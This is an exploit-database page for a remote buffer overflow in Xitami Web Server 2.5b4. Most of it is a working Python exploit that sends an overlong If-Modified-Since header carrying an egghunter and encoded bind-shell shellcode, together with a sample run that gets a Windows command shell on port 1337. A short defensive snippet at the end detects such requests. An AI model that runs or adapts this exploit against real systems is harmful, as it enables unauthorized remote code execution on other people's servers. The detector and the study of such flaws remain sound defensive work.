Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter) - exploit.company
Vendor: Xitami Web Server
Author: Glafkos Charalambous
CVSS: 7.5 (HIGH)
Type: Remote Buffer Overflow
CWE: 119
Product Name: Xitami Web Server
Affected Version From: 2.5b4
Affected Version To: 2.5b4
Patch Exists: NO
Related CWE:
CPE: a:xitami_web_server:xitami_web_server:2.5b4
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 En
2011

Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter)

This exploit targets Xitami Web Server 2.5 and exploits a remote buffer overflow that is triggered by an overlong If-Modified-Since request header. The script sends a single crafted GET request containing an egghunter and an encoded bind-shell payload, then prints a reminder to connect to TCP port 1337; it does not itself verify that the shell came up. If the overflow succeeds, the attacker obtains a command shell on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update Xitami Web Server to the latest version.

Exploit-DB raw data:

# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter)
# Date: June 4, 2011
# Author: Glafkos Charalambous
# Version: 2.5b4
# Tested on: Windows XP SP3 En
# Discovered by: Krystian Kloskowski
#
# root@bt:~/Desktop# python xitami.py 192.168.0.24 80
# [+] Connected
# [+] Sending payload...
# [+] Check Port 1337 for your shell
# root@bt:~/Desktop# telnet 192.168.0.24 1337
# Trying 192.168.0.24...
# Connected to 192.168.0.24.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Xitami>ipconfig
# ipconfig
#
# Windows IP Configuration
#
#
# Ethernet adapter Local Area Connection:
#
#        Connection-specific DNS Suffix  . : 
#        IP Address. . . . . . . . . . . . : 192.168.0.24
#        Subnet Mask . . . . . . . . . . . : 255.255.255.0
#        Default Gateway . . . . . . . . . : 192.168.0.1
#
# C:\Xitami>

import time
import socket
import sys

if len(sys.argv) != 3:
    print "Usage: ./xitami.py <Target IP> <Target Port>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

egghunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02"
"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"w00t" # 4 byte tag
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# ./msfpayload windows/shell_bind_tcp lport=1337 exitfunc=process R | ./msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -c 7 -t c
shellcode = ("\xba\xa2\xcf\xad\x8d\xdb\xd1\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x7e\x83\xee\xfc\x31\x56\x11\x03\x56\x11\xe2\x57\x70\xe4\x08"
"\x09\x2d\x2e\xd1\xec\x46\xf5\x22\x56\x96\x3c\x7b\x1e\x5b\x7e"
"\x78\xef\x23\x71\x82\x3e\x5f\xf1\xd3\x58\x3b\x53\x30\xe6\xbc"
"\x82\xb3\xba\xf5\xdf\x9e\x21\x78\xcd\x8d\x25\x87\x5b\xd4\xfd"
"\x6c\xcd\xcf\x7b\x68\x84\x3d\x07\xcb\x1e\x1b\x06\x11\x31\xfd"
"\x90\x27\xff\xe6\x22\x4d\xdd\x1a\xc9\xe1\x93\x45\x4b\x13\x48"
"\x74\xcc\x45\x07\x95\xd1\x38\xde\xa3\xef\x7d\x68\xb0\xd1\x67"
"\x60\xe5\x89\xb5\xf7\x3e\x2f\x49\xd7\xb8\xc0\xc6\x1b\xfc\xe2"
"\xbb\xc8\xae\x39\x78\x81\x4d\xc4\x1c\x2d\x16\x6d\xc3\x04\xde"
"\x58\x43\x4e\xc5\x60\x46\x4b\xc9\x79\xfb\x32\xdd\x46\xb8\xd4"
"\x61\x62\x92\xf6\xe8\x7b\xe8\x41\xc0\xee\xe2\xbb\x64\x6c\xb8"
"\x43\x2d\xfd\xda\x61\xb0\x7c\xe6\x36\xab\x3e\x7a\x80\xe6\x60"
"\x2b\x52\x1d\x53\xed\xb4\x94\x86\x8b\x66\x26\x56\x67\xe0\x7c"
"\xfb\x1c\xb9\x4f\x75\x4e\x7d\x63\xac\xbc\x7e\x90\xfd\xa1\xb2"
"\x6b\x06\xb4\x92\x1f\x90\x26\x1a\x4f\x3d\x18\xa2\x3c\x72\x0f"
"\x93\x37\xf7\xf3\x5a\x7f\x33\xbf\x9f\xc2\xea\xb9\x13\x6c\x77"
"\xb6\xd4\xc0\x37\x86\x78\xd3\x86\x8c\x9f\x3a\x0f\xb1\x5e\x0f"
"\xb9\x09\xf1\x0c\xe9\x2f\xb7\xd7\xea\x37\x4f\x6a\xc3\xdb\x7b"
"\x48\x32\x05\xd4\x48\xcc\x47\x59\x41\xc5\x0b\xf5\x02\xeb\x06"
"\x7f\xae\x25\x2b\x16\x2d\x51\x18\x91\x9c\x96\x32\x17\x1c\x6e"
"\x95\xb9\x4e\xf5\xa6\x29\x8b\x30\x48\x07\x55\xf1\xe4\xa8\xe2"
"\x4d\xe0\x6a\xef\xd3\x4e\x07\x4d\xb2\x25\xe0\xb2\x33\x1b\xdc"
"\x50\xac\x59\x35\xd9\x91\x9c\x44\x5a\xc1\x52\x19\x0f\x03\xc9"
"\x1d\x71\xe5\x79\x54\x3d\xc0\x87\x4d\x9f\x9d\x69\x09\xd4\x6b"
"\xe2\xa5\xe0\x77\xd0\xb9\xbd\x85\xd0\x35\xcb\x59\x78\x22\xf2"
"\x25\x78\x64\xf6\x2a\x8d\x3e\xc8\xce\x7c\x6f\x64\x24\xb4\x2c"
"\x14\xd5\xff\x9c\x84\x40\xf1\x74\xcf\x3c\x4f\xac\x2c\xe2\xae"
"\xaa\xaf\xb0\xcf\xc8\x31\x30\xb3\xb0\x8b\x08\x25\x2d\x95\x3d"
"\xf5\x0c\x1f\x23\xd9\x87\x31\x79\xd2\x8d\xad\x59\xdd\xb0\x4c"
"\xa4\x17\xeb\x97\xb0\x90\x3c\x45\xb7\x3f\x2b\x04\xf3\xc6\xe8"
"\x56\x25\x7a\xfd\x6e\x3b\xef\x64\x14\x9b\x67\x08\x9c\x47\x73"
"\x24\x1e\x1e\xc6\xd2\xad\xcc\x0c\xc8\xbb\x4e\x12\xde\xf5\x35"
"\x25\xe0\xb0\xef\x04\xb5\x29\x62\xc6\x56\x44\x52\x16\xa3\x63"
"\x63\xcd\xd1\xc9\x45\x87\x3b\xd6\x4b\x7a\x24\xd5\xd4\x7d\x4c"
"\x83\x06\x16\x88\x7f")

jump = "\xeb\x22" # short jump

buf = "A" * 72                  
buf += "\xD7\x30\x9D\x7C" # jmp esp (user32.dll) / XP SP3 English
buf += jump
buf += "\x90" * 50
buf += egghunt
buf += "w00tw00t" # tag
buf += shellcode

header = (
'GET / HTTP/1.1\r\n'
'Host: %s\r\n'
'If-Modified-Since: pwned, %s\r\n'
'\r\n') % (target, buf)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    print "[+] Connected"
except:
    print "[!] Connection Failed"
    sys.exit(0)

print "[+] Sending payload..."
s.send(header)
time.sleep(1)
s.close()

print "[+] Check port 1337 for your shell"
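A defender-side check for the request shape used in the listing above, written as an added example (it is not part of the Exploit-DB entry or of Xitami): it parses a raw HTTP request and flags an If-Modified-Since header that is overlong, is not an RFC 7231 IMF-fixdate, or carries non-printable bytes, and separately flags the w00tw00t egg tag the egghunter scans memory for. The 64-byte length threshold and the two sample requests are constructed assumptions.

```python
import re
from typing import Dict, List

# An IMF-fixdate ("Sun, 06 Nov 1994 08:49:37 GMT") is 29 bytes; 64 is an
# assumed generous ceiling, since the listing's header runs to hundreds.
MAX_DATE_LEN = 64
EGG_TAG = b"w00tw00t"  # tag the listing's egghunter searches memory for
# Only the preferred IMF-fixdate form is accepted; the obsolete RFC 850 and
# asctime forms (rare in practice) would also be reported as "not a date".
HTTP_DATE = re.compile(
    rb"^[A-Za-z]{3}, \d{2} [A-Za-z]{3} \d{4} \d{2}:\d{2}:\d{2} GMT$")


def parse_headers(raw: bytes) -> Dict[bytes, bytes]:
    """Return header name (lower-cased) -> value for a raw request."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw: bytes) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    ims = parse_headers(raw).get(b"if-modified-since")
    if ims is not None:
        if len(ims) > MAX_DATE_LEN:
            findings.append("If-Modified-Since length %d exceeds %d"
                            % (len(ims), MAX_DATE_LEN))
        if not HTTP_DATE.match(ims):
            findings.append("If-Modified-Since is not an IMF-fixdate")
        if any(b < 0x20 or b > 0x7E for b in ims):
            findings.append("non-printable bytes in If-Modified-Since")
    if EGG_TAG in raw:
        findings.append("egghunter tag w00tw00t present in request")
    return findings


# Constructed samples: a normal conditional GET, and one that mimics the
# listing's header layout (filler, NOPs, egg tag) without any shellcode.
BENIGN = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
          b"If-Modified-Since: Sun, 06 Nov 1994 08:49:37 GMT\r\n\r\n")
SUSPECT = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
           b"If-Modified-Since: pwned, " + b"A" * 72 + b"\x90" * 8
           + EGG_TAG + b"\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_request(req))
```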